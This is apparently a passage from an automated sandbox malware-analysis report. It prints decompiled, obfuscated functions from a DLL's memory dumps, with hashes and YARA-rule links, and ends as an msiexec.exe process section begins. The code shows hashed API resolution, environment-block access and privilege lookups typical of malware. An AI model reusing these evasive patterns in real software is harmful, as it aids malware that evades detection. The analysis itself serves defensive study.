				} else {
					_t133 = _t163;
					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
						L11:
						 *0x6e8820d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
						return _t133;
					}
					_t163 = _t133;
					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
						_t133 = _t163;
						goto L11;
					}
					goto L10;
				}
			}

0x6e863a39
0x6e863a50
0x6e863a5f
0x6e863a61
0x6e863a65
0x6e863a68
0x6e863a8b
0x6e863a8e
0x6e863a6a
0x6e863a71
0x6e863a76
0x6e863a7b
0x6e863a7d
0x6e863a82
0x6e863a86
0x6e863a86
0x6e863a91
0x6e863a94
0x6e863aa0
0x6e863ab2
0x6e863abb
0x6e863ae0
0x6e863abd
0x6e863ac0
0x6e863ac3
0x6e863ac8
0x6e863ad0
0x6e863adb
0x6e863adb
0x6e863ac3
0x6e863ae3
0x6e863ae5
0x6e863ae9
0x6e863afa
0x6e863aff
0x6e863b01
0x6e863b07
0x6e863b19
0x6e863b1b
0x6e863b1e
0x6e863b20
0x6e863b28
0x6e863b2b
0x6e863b32
0x6e863b5c
0x6e863b63
0x6e863b69
0x6e863b6c
0x6e863b77
0x00000000
0x6e863b34
0x6e863b34
0x6e863b45
0x6e863b79
0x6e863b8c
0x6e863b9d
0x6e863b9d
0x6e863b47
0x6e863b5a
0x6e863b9e
0x00000000
0x6e863b9e
0x00000000
0x6e863b5a

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c3713e12d6bb01b59d188f72a4ce9a707e64c9e5bcf658da1bcc9ddd1cde87
Instruction ID: 2b56896e973b66e0220627a146965bbe4cbcebc77080cb58fbe25806e46fefb9
Opcode Fuzzy Hash: 43c3713e12d6bb01b59d188f72a4ce9a707e64c9e5bcf658da1bcc9ddd1cde87
Instruction Fuzzy Hash: E841A572E001294F9B08CE6DCC915FFB7FAEBC8311B15852AE855E7351D534AD0687E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E869A60, Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6E869A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _t41;
				signed char _t42;
				signed int _t43;
				signed char _t45;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed char _t59;
				signed int _t61;
				signed char _t66;
				signed int _t67;
				signed int _t68;
				signed char _t71;
				signed int _t78;
				signed char _t83;
				signed char _t85;
				signed int _t86;
				signed int _t94;
				signed int _t105;
				signed int _t116;

				_t105 = _a4;
				_t59 = (_t105 ^ 0x000000f5) - _t105;
				_t41 = E6E867DD0(0xa4) & _t59;
				_t78 = _t41 * _t59 >> 0x20;
				_t42 = _t41 * _t59;
				_t68 = _t42;
				_t61 = _t42 & _t105;
				_t43 = _a8;
				asm("sbb eax, [ebp+0x14]");
				if(_t105 < _a12) {
					_t55 = _t68 + _t61;
					_t78 = _t55 * _t78 >> 0x20;
					_t68 = _t55 * _t78;
					_t43 = _t68;
					_v20 = _t43;
					_t61 = 0;
				}
				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
					_t94 = _a12;
				} else {
					_t94 = _a12;
					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
						_t54 = _v20;
						_t67 = _t61 & _t54 * _t94;
						_t43 = _t54 + _t67 + 0xe;
						_t68 = _t67;
					}
				}
				_v24 = 0;
				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
					_v24 = 0x1cb;
				}
				_t83 = _t43 ^ _v20;
				_t45 = _t68 & _t83;
				_t66 = _t45 + 0xfffffefa;
				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
					_t83 = _t71;
					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
				}
				_v20 = _t83;
				_t116 = _t83;
				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
					L14:
					_t50 = (_t68 ^ _v20) - _t66;
					_t85 = _v24;
					_t86 = _t50 * _t85 >> 0x20;
					_t68 = _t50 * _t85;
					goto L15;
				} else {
					asm("sbb eax, edi");
					if(_t116 >= _a4) {
						goto L14;
					}
					_t86 = _v24;
					L15:
					 *0x6e882098 = _t68;
					return _t86;
				}
			}

0x6e869a6c
0x6e869a77
0x6e869a88
0x6e869a8a
0x6e869a8a
0x6e869a8c
0x6e869a91
0x6e869a96
0x6e869a98
0x6e869a9b
0x6e869a9f
0x6e869aa1
0x6e869aa3
0x6e869aa5
0x6e869aa8
0x6e869aab
0x6e869aab
0x6e869ac0
0x6e869aeb
0x6e869ac2
0x6e869aca
0x6e869ad4
0x6e869ad6
0x6e869ade
0x6e869ae3
0x6e869ae7
0x6e869ae7
0x6e869ad4
0x6e869afb
0x6e869b04
0x6e869b06
0x6e869b06
0x6e869b0f
0x6e869b14
0x6e869b19
0x6e869b2f
0x6e869b46
0x6e869b48
0x6e869b52
0x6e869b52
0x6e869b57
0x6e869b5a
0x6e869b70
0x6e869b7e
0x6e869b83
0x6e869b85
0x6e869b88
0x6e869b8a
0x00000000
0x6e869b72
0x6e869b75
0x6e869b77
0x00000000
0x00000000
0x6e869b79
0x6e869b8c
0x6e869b8f
0x6e869b9d
0x6e869b9d

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37b6500bc45b1d3fc3757d5c71fcc2d3ecb8806ce516e54a1abc34cd41f8833
Instruction ID: 1cf36902edbb5a776f6a8d58d98aad30144f373604ec777d5b4b5dc2b56d446c
Opcode Fuzzy Hash: b37b6500bc45b1d3fc3757d5c71fcc2d3ecb8806ce516e54a1abc34cd41f8833
Instruction Fuzzy Hash: 0D415133A406394B9B10CEAD98911EFB7E6AFD9321B168525DC58BB384D634ED068BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E878830, Relevance: .1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E878830(void* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t34;
				void* _t42;
				signed short _t45;
				signed int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t63;
				signed short _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t81;

				_t26 = E6E8700D0(_a8);
				_t68 = _t67 + 4;
				_t76 = _t26;
				_v32 = _t26;
				if(_t26 == 0) {
					L6:
					return 0;
				}
				_t48 = _a4;
				_t28 = E6E879180(_t76, _a4);
				_t69 = _t68 + 4;
				_t61 = _t28;
				if(_t61 != 0) {
					if( *_t61 == 0) {
						goto L6;
					}
					_t62 = _t61 + 0x14;
					_t79 = _t62;
					while(1) {
						_t34 = E6E86ACF0(E6E861460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E6E861460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
						_t69 = _t69 + 0x10;
						if(_t34 == 0) {
							break;
						}
						_t81 =  *_t62;
						_t62 = _t62 + 0x14;
						if(_t81 != 0) {
							continue;
						}
						goto L6;
					}
					_t51 =  ~(E6E861460(__eflags, E6E8622E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
					E6E861460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
					_t73 = _t69 + 0x18;
					_t66 =  *_t51;
					_v28 = _t51;
					__eflags = _t66;
					if(_t66 == 0) {
						L12:
						return 1;
					}
					_t54 = _a4;
					_t63 = 0;
					_t55 = _t54 + 0xd8be785;
					__eflags = _t55;
					_v24 = _t55;
					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
					while(1) {
						E6E863750(__eflags, _t66, 0xffff);
						_t42 = E6E869D50(0x960018d7);
						__eflags = _t66;
						_t57 = _v24 + _t66;
						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
						_t45 = E6E876B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
						_t73 = _t73 + 0x14;
						__eflags = _t45;
						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
						__eflags = _t45;
						 *(_v20 + _t63) = _t45;
						if(_t45 == 0) {
							break;
						}
						_t66 =  *(_v28 + _t63 + 4);
						_t63 = _t63 + 4;
						__eflags = _t66;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					return _t55;
				}
				return 1;
			}

0x6e87883c
0x6e878841
0x6e878844
0x6e878846
0x6e878849
0x6e87889c
0x00000000
0x6e87889c
0x6e87884b
0x6e87884f
0x6e878854
0x6e878857
0x6e87885d
0x6e878862
0x00000000
0x00000000
0x6e878864
0x6e878864
0x6e878870
0x6e878888
0x6e87888d
0x6e878892
0x00000000
0x00000000
0x6e878894
0x6e878897
0x6e87889a
0x00000000
0x00000000
0x00000000
0x6e87889a
0x6e8788c2
0x6e8788c8
0x6e8788cd
0x6e8788d0
0x6e8788d2
0x6e8788d5
0x6e8788d7
0x6e87894a
0x00000000
0x6e87894a
0x6e8788dc
0x6e8788df
0x6e8788e3
0x6e8788e3
0x6e8788e9
0x6e8788ec
0x6e8788f0
0x6e8788f8
0x6e878905
0x6e878910
0x6e878915
0x6e87891c
0x6e878923
0x6e878928
0x6e87892e
0x6e878933
0x6e878935
0x6e878937
0x6e87893a
0x00000000
0x00000000
0x6e87893f
0x6e878943
0x6e878946
0x6e878948
0x00000000
0x00000000
0x00000000
0x6e878948
0x00000000
0x6e878951
0x6e8788a5

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb1cae3c93fc8ac119ccc2db5715d6eb57a83ae2a4cf24edaf0a63e1cb39176
Instruction ID: 212d525d57527a09ed26718e6fd2b682eacfbc28c9d12b2bae81261166308d1f
Opcode Fuzzy Hash: cbb1cae3c93fc8ac119ccc2db5715d6eb57a83ae2a4cf24edaf0a63e1cb39176
Instruction Fuzzy Hash: 1531B4B6E001269BEF118AA9EC41AAE77A9EF51358F050834E918AB341E731DD14C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6E869C60, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E869C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				signed int _t42;
				signed int _t44;
				signed char _t45;
				signed int _t49;
				signed char _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t75;
				signed int _t76;
				signed int _t88;
				signed int _t94;
				signed int _t95;

				_t95 = _a12;
				_t35 = _a4 * 0xffffffa5 * _t95;
				_t53 = _t35 - _t95;
				_t49 = 0;
				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
					_t36 = _a4;
					_t75 =  !_t95 & (_t53 | _t35) + _t36;
					_t38 = _t75 * 0x73;
					_t53 = _t75;
					_t76 = _t36;
				} else {
					_t38 = 0;
					_t76 = _a4;
				}
				asm("sbb edx, [ebp+0xc]");
				if(_t95 >= _t76) {
					_t49 = 0x3a1;
				}
				_t56 = _t53;
				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
				_t57 = _t56 ^ _t94;
				_t42 = _t49;
				_v24 = _t57;
				_v32 = _t42;
				_t51 = _t57 * _t42;
				_t44 = E6E867DD0(0xc5) * _t51;
				_v17 = _t44;
				_v28 = _t94;
				_t45 = _t44 * _t94;
				_t60 = _a8;
				asm("sbb edx, ecx");
				if(_t51 >= _a4) {
					L8:
					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
				} else {
					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
						goto L8;
					}
				}
				 *0x6e882100 = _t88;
				return _v32;
			}

0x6e869c69
0x6e869c73
0x6e869c7c
0x6e869c85
0x6e869c89
0x6e869c94
0x6e869c9f
0x6e869ca4
0x6e869ca7
0x6e869ca9
0x6e869c8b
0x6e869c8b
0x6e869c8d
0x6e869c8d
0x6e869cb0
0x6e869cb3
0x6e869cb5
0x6e869cb5
0x6e869cbe
0x6e869cc4
0x6e869cc7
0x6e869cc9
0x6e869ccb
0x6e869cd0
0x6e869cd3
0x6e869ce3
0x6e869ce5
0x6e869cea
0x6e869ced
0x6e869cfa
0x6e869cfd
0x6e869cff
0x6e869d1e
0x6e869d38
0x6e869d01
0x6e869d0b
0x6e869d0d
0x00000000
0x00000000
0x6e869d0d
0x6e869d3a
0x6e869d4a

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca365b3c6f9c5cc63f9fe6a073cd7a8a585fdedcb179760039118b25fae469e
Instruction ID: d7870bc475d8c0fd5950f76f3e06c790a8d61479e2ecb510de834e257ac89748
Opcode Fuzzy Hash: 8ca365b3c6f9c5cc63f9fe6a073cd7a8a585fdedcb179760039118b25fae469e
Instruction Fuzzy Hash: D431C331B004194B9B0DCF6DC8925BFBBEBABC4311B14C13EE809DB688D9309A0687C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8A42DE, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154589702.000000006E8A4000.00000040.00020000.sdmp, Offset: 6E8A4000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 8cd8b1e92accaa40d1db33f88406750ecb9f1935113ce8732a8678e3a09a1fe0
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: A911B1733401019FDB54CE9DEC90E96B3AAEBD9230B258466EE04CB315DB35E842C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8A46D7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154589702.000000006E8A4000.00000040.00020000.sdmp, Offset: 6E8A4000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: ca103c18b1d50b1d8c64dd785f69a053eff934c5424c89790f8b906056c7d243
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 9B01F5363041898FDB04CB6DD894D7AB7E4EBC3720B15C47EC64683616DA24E846C920

Uniqueness

Uniqueness Score: -1.00%

Function 6E87CE40, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E87CE40(short* _a4, intOrPtr _a8) {
				void* _t8;
				short* _t9;
				intOrPtr _t10;
				short* _t11;
				void* _t12;

				_t10 = _a8;
				_t11 = _a4;
				if(_t10 != 0) {
					_t11 = _t11 + 2;
					_t9 = 0;
					while( *((short*)(_t11 - 2)) != 0) {
						L3:
						_t11 = _t11 + 2;
					}
					if( *_t11 == 0) {
						_t11 = 0;
					} else {
						_t8 = E6E869D50(0x1e99166a);
						_t12 = _t12 + 4;
						_t9 = _t9 + _t8 - 0x7aed16c5;
						if(_t9 != _t10) {
							goto L3;
						} else {
						}
					}
				}
				return _t11;
			}

0x6e87ce46
0x6e87ce49
0x6e87ce4e
0x6e87ce50
0x6e87ce53
0x6e87ce5a
0x6e87ce60
0x6e87ce60
0x6e87ce63
0x6e87ce6e
0x6e87ce8a
0x6e87ce70
0x6e87ce75
0x6e87ce7a
0x6e87ce7d
0x6e87ce86
0x00000000
0x00000000
0x6e87ce88
0x6e87ce86
0x6e87ce6e
0x6e87ce92

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24da39859ccb92acc90950274e1cac54e860e005d0011c873bb6ab86854ba77
Instruction ID: 78a551ed5dfb6826139661150b7c96c26d59515008fc6e24e7f2e8594491c841
Opcode Fuzzy Hash: c24da39859ccb92acc90950274e1cac54e860e005d0011c873bb6ab86854ba77
Instruction Fuzzy Hash: B7F02E13F5072846DB315ED5D88185EF3B4D7466D4F059829D818671C1E3B168C4C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E872EF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E872EF0() {

				return  *[fs:0x30];
			}

0x6e872ef6

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E8646E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8646E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x6e8646e7
0x6e8646ea
0x6e8646ed
0x6e8646f4
0x6e8646fa
0x6e8646ff
0x6e864709
0x6e864711
0x6e864713
0x6e864715
0x6e864718
0x6e864720
0x6e864725
0x6e864781
0x6e864784
0x6e864786
0x6e864791
0x6e86479a
0x6e86479f
0x6e8647a1
0x6e8647a3
0x6e8647ab
0x00000000
0x00000000
0x6e86472c
0x6e864731
0x6e86473a
0x6e8647ad
0x6e8647ad
0x6e8647b6
0x6e8647ca
0x6e8647ca
0x6e8647cd
0x6e8647d1
0x6e8647e2
0x6e8647e7
0x6e8647f9
0x6e8647fc
0x6e8647fe
0x6e864800
0x6e864806
0x6e864808
0x6e86480a
0x6e864810
0x6e86481d
0x6e864838
0x6e864838
0x6e864810
0x6e864844
0x6e864844
0x6e8647b8
0x6e8647be
0x00000000
0x6e8647c5
0x6e8647c5
0x00000000
0x6e8647c5
0x6e8647be
0x6e86473c
0x6e864743
0x6e864745
0x6e86474d
0x6e864845
0x6e864753
0x6e86475d
0x6e864760
0x6e86476d
0x6e864773
0x6e86477c
0x6e86477c
0x6e86474d
0x6e864743

APIs

OffsetRect.USER32 ref: 6E8646FF
LookupPrivilegeValueW.ADVAPI32(00000000,-6E881D33,?), ref: 6E864791
EndDialog.USER32 ref: 6E8647D1
SetTextColor.GDI32(-70DA1D33,-725E1D33), ref: 6E86481D

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: cda27c4e446e6aff37869a29b3194b82b14407cbeed1adbb34b0409ebd0d7c26
Instruction ID: 790a09a478d7733bc258f653ec462642ed999293524763d3fb083b222f1f82de
Opcode Fuzzy Hash: cda27c4e446e6aff37869a29b3194b82b14407cbeed1adbb34b0409ebd0d7c26
Instruction Fuzzy Hash: 8E41D833B005285BDB08CE99CCF06BF77AAFBC9351B568929EC199B781C134A946C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8629D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8629D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -1854396875
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -1854396003
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -1854396826
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x6e8629d7
0x6e8629df
0x6e8629e1
0x6e8629e5
0x6e8629f0
0x6e8629f5
0x6e862a01
0x6e862a17
0x6e862a1f
0x6e862a2b
0x6e862a2b
0x6e862a31
0x6e862a34
0x6e862a37
0x6e862a3d
0x6e862a41
0x6e862a43
0x6e862a43
0x6e862a4b
0x6e862a51
0x6e862a53
0x6e862a57
0x6e862a59
0x6e862a5c
0x6e862a62
0x6e862a6f
0x6e862a81

APIs

DeleteDC.GDI32(-6E87DD33), ref: 6E8629E5
SetWindowPos.USER32(-6E87DD33,6E867BEC,00000191,6E867BEC,6E867BEC,6E867BEC,00000191), ref: 6E862A1F
ResetEvent.KERNEL32(-6E87D663,?,6E867BEC,-6E881FA0,-725E1D33,-6E881D33,?,6E869287,-6E881D33,?,6E8677A1,00000001,?,-6E881D33,?,6E866A74), ref: 6E862A4B
CreateDIBSection.GDI32(-6E87D99A,-6E87D99A,-6E87D9CB,-6E87D663,-6E87D9CB,-6E87D9CB), ref: 6E862A6F

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: aaf4bb605c23fa3b1b99d6450ae6e8386e4b13cd26f24b2a45a6b8b5eeb8e692
Instruction ID: 7ba637b84f1bc6a7d3a5d30104bc64a85923f5b5b71cd889e6d4b06e520329da
Opcode Fuzzy Hash: aaf4bb605c23fa3b1b99d6450ae6e8386e4b13cd26f24b2a45a6b8b5eeb8e692
Instruction Fuzzy Hash: 5E112B73B006247FE7248A5ACC49EDBBA5FE7CA710B060126FC59DB140E670AB05C6E0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 1948 Parent PID: 2336 msiexec.exeCOMMON

Executed Functions

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000A9C90(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t26;
				int _t29;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				intOrPtr* _t34;
				signed char _t36;
				signed int _t37;
				signed int _t38;
				void** _t40;
				void* _t46;
				void* _t48;
				void* _t49;

				_t14 = E0009BF50(__eflags, 9, 0xbe1ef6e);
				_t15 = E0009BF50(__eflags, 0, 0x160d384);
				_t48 = _t46 + 0x10;
				_t16 =  *_t15();
				_t40 =  &_v20;
